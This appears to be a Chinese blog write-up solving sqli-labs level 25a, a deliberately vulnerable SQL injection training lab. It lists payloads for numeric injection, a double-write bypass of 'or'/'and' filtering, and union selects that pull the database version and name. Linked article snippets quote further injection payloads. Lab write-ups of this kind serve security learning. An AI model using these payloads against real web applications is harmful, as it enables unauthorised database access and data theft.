sqllab第二十五A关通关笔记

最新推荐文章于 2024-07-25 14:12:59 发布
最新推荐文章于 2024-07-25 14:12:59 发布
阅读量431 收藏 1
点赞数 4
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136767279
版权

知识点:

  • 数值型注入
  • 双写绕过
    • oorr
    • anand
  • 这里不能用错误注入(固定错误回显信息)
  • 联合注入

测试发现跟25关好像一样,就是过滤了and or # 等东西

构造payload:id=1/0

发现成功运算了,这是一个数值型的注入

构造payload:id=1/0+oorr+1=1--+

成功显示了内容,可以尝试错误注入

构造payload:id=1/0+oorr+exp(710)=1--+

发现没有任何的回显信息,说明这里不能用错误注入

老方法,使用联合注入

构造payload:id=1/0+union+select+1,2,3+--+

成功回显了输入的内容

下面开始进行数据库名和版本的获取

构造payload:id=1/0+union+select+1,version(),database()+--+

成功获取了版本信息和数据库名

同理,可以获取数据库其他内容,这里不演示了,收工

10

I_WORM
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
松鼠大战1第A通关录像.mp4
09-10
松鼠大战1第A通关录像
sql-labs 闯 21~25
qq_44663230的博客
08-29 1262
sql-labs 闯21~25
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五SQLi-LABS Less-25SQLi-LABS Less 25SQLiLABS Less25SQLi Less 25
Sqli-labs——lesson25(联合查询和报错注入,附各种sql万能密码)
weixin_62281892的博客
07-12 896
25
Sqli_labs第二十五(报错注入)
m0_65463546的博客
12-18 365
本人呢也是学习Sql注入不久的小白,可能对此题理解的也不是很透彻,但是也算摸爬滚打的把这题做出来了,跟大家一起分享分享,有什么不足的地方欢迎大家指正!相信做到这里的小伙伴对什么是联合注入、盲注啊,单引号爆点位这种基本注入方式已经很熟悉了,我也不做过多的废话在这上面,直接开始我们的正题。
sqlilabs25
cuddlylm的博客
04-16 370
首先注入正常的参数,网页回显正常的信息。使用单引号来闭合,网页回显报错信息。 ?id=1' 使用 “–+” 注释掉后面的内容后回显正常,说明此处是单引号闭合的字符型注入。 构造条件时,我们发现网页回显报错,根发现 “OR” 不见了。 id=1' OR 1 = 1--+ 使用 “AND” 进行注入时,网页也报错,“AND” 运算符也不见了。 由此可见此处网页对我们传入的参数进行了过滤 “OR” 和 “AND” 运算被过滤了。 根据之前学的绕过方法,我们使用双鞋绕过试试 具体的方式为在被过滤的字符串中
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
松鼠大战1第G通关录像.mp4
09-16
松鼠大战1第G通关录像
松鼠大战1第F通关录像.mp4
09-15
松鼠大战1第F通关录像
sql-lab 21~25总结(后续持续更新)(含二次注入解释)
m0_62879498的博客
12-20 2767
二十一 输入admin发现好像没区别 我们来对二十一进行抓包: 发现它cookie发生了变化,不在是上一的admin, 而是一串乱码。 这是因为:admin进行了一次 base64编码 $cookee = base64_decode($cookee); 我们可以对它进行一次解码: 发现就是admin。 剩下的和20相同。只需讲语句转化为base64的加密 将:admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) – q
sqli-labs————less 25(绕or\and)
Fly_鹏程万里
05-12 991
Less-25卡提示,我们可以知晓该卡主要过滤了“or”和“and”,那么我们看看它的源代码到底是如何过滤的:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns...
sqli-lab学习笔记(学习笔记)(21-30)
大方子
08-21 5850
  打完21-30之后的后记:   后来发现,网上所有就是讲解sqli的,到后面都没有用查有多少字段数的order by这个语句,几乎都没有提到过,我自己也尝试在后面的变形中加入加入进去但是不知道为什么老是出错,现在我想到的办法就是   比如28a   语句是这样的 http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a...
SQL-LABS 25
qq_52863655的博客
08-26 229
第二十五: 直接开始验证它的闭合符号。发现是单引号闭合,然后查列 利用 order by http://127.0.0.1/sqli/Less-25/?id=122’ order by 2 查看底下的蓝字发现少了or 所以猜测对or进行了绕过。所以采用union select进行查询 http://127.0.0.1/sqli/Less-25/?id=122’ union select 1,2,3–+ 可以查询出。接下来就是常规注入。 查库:http://127.0.0.1/sqli/Less-25/?
deepseek-vl 论文阅读笔记
samoyan的博客,记录技术成长~
07-22 1225
我们的语言模型基于DeepSeek LLM(DeepSeek-AI,2024),其微设计大体遵循LLaMA(Touvron等,2023a,b)的设计,采用带有RMSNorm(Zhang和Sennrich,2019)函数的Pre-Norm结构,并使用SwiGLU(Shazeer,2020)作为前馈网络(FFN)的激活函数,中间层维度为8/3模型维度。此外,我们引入了一种新的“模态预热”策略。为了促进创新并支持广泛的应用需求,我们公开了两个版本的模型,分别为1.3B和7B,以满足不同计算能力的需求。
vite5+vue3开发阅读APP实战笔记20240725
Python私教
07-25 395
修改src/page/home/index.vue,使用组件和API。注意,这里无论是组件还是API,都不需要我们手动引入,我们配置了自动导入以后,vite会帮我们自动导入。创建 src/page/home/index.vue。修改 vite.config.js。修改vite.config.js。修改 src/main.js。修改src/App.vue。
Golang学习笔记20240725,Go语言基础语法
最新发布
Python私教
07-25 532
如果我们在遍历的时候,不想要key或者value,也可以用下划线替代,下划线叫做匿名变量。go语言里面的switch语句每个case天生就是独立的,不需要加break。指针可以直接对内存地址进行操作。使用*表示指针,使用&取地址。切片在go语言里面非常常用,因为其有动态扩展的特性。运行方式3:goland右键运行。使用加号可以对字符串进行拼接。
学习笔记-系统框图传递函数公式推导
weixin_45875994的博客
07-24 799
输出C(s)是前向路径(通过G(s))的输出与反馈路径(通过H(s))的输出之差(在负反馈系统中)。因此,我们可以写出以下系式:这里,G(s)R(s)是前向路径的输出,而G(s)H(s)C(s)是反馈路径的输出(注意,反馈路径的输出先经过H(s),再与前向路径的输出相减)。
谷粒商城实战笔记-50-51-商品分类的删除
epitomizelu的专栏
07-23 562
这两节的内容是开发商品分类的删除功能。
upload-labs19通关
07-28
根据引用\[1\]中的内容,通关upload-labs的第19的方法如下: 1. 打开18的myupload.php文件,进行修改,确保上传的图片可以放到upload文件夹下。 2. 与第17类似,这还会检测文件的后缀名,所以需要上传一个图片马,而不是直接上传php文件。 3. 上传一个名为22.gif的图片,并进行抓包。 4. 进行与第17相似的攻击过程,点击"Start Attack"按钮。 5. 完成以上步骤后,即可成功通关第19。 以上是通关upload-labs第19的方法。根据引用\[2\]中的内容,这些方法在实战中可能会有所不同,但基本原理是相似的。希望这些方法能对你的学习有所帮助。 #### 引用[.reference_title] - *1* *2* [upload-labs详解1-19通关全解(最全最详细一看就会)](https://blog.csdn.net/qq_53003652/article/details/129969951)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [upload-labs通关](https://blog.csdn.net/as604049322/article/details/127418017)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值